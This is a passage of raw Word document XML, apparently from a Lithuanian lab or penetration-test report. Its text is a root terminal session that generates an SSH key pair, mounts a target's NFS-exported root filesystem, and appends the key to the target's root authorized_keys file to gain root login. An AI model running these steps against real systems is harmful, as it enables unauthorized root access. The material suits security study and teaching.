      <w:r w:rsidR="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>nux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:~#</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ssh-keygen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27A63585" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Generating</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pair</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6007BC" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> to save </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351577A9" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>passphrase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>empty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>no</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>passphrase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139C695C" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>same</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>passphrase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>again</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7282B587" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Your</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>identification</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>has</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>been</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>saved</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7AE459" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Your</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>has</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>been</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>saved</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/id_rsa.pub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496D7D0" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E22A38"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 xml:space="preserve">:~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/r00t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A7026"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 xml:space="preserve">:~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>mount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP:/ /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/r00t/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582D386C"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 xml:space="preserve">:~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/id_rsa.pub &gt;&gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/r00t/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59DA602C"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 xml:space="preserve">:~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>umount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/r00t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A86921" w14:textId="29B3A52C" w:rsidR="00CC09C3" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD442E7" w14:textId="4917816B" w:rsidR="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25CCB61F" w14:textId="39738B58" w:rsidR="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20B57EC5" w14:textId="6DCD1033" w:rsidR="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF35D0D" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CEEA16D"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5EFA86C6" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C837948" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="761F9F03" w14:textId="0C18575B" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8"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6637C1" w:rsidRPr="00607DC0" w14:paraId="107459CE"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613D0D31" w14:textId="0146B869" w:rsidR="006637C1" w:rsidRPr="00607DC0" w:rsidRDefault="006637C1"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7E2FF26E" w14:textId="77777777" w:rsidR="006637C1" w:rsidRPr="00607DC0" w:rsidRDefault="006637C1"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6637C1" w:rsidRPr="00607DC0" w14:paraId="013F2CC0" w14:textId="77777777" w:rsidTr="003C0B7F">
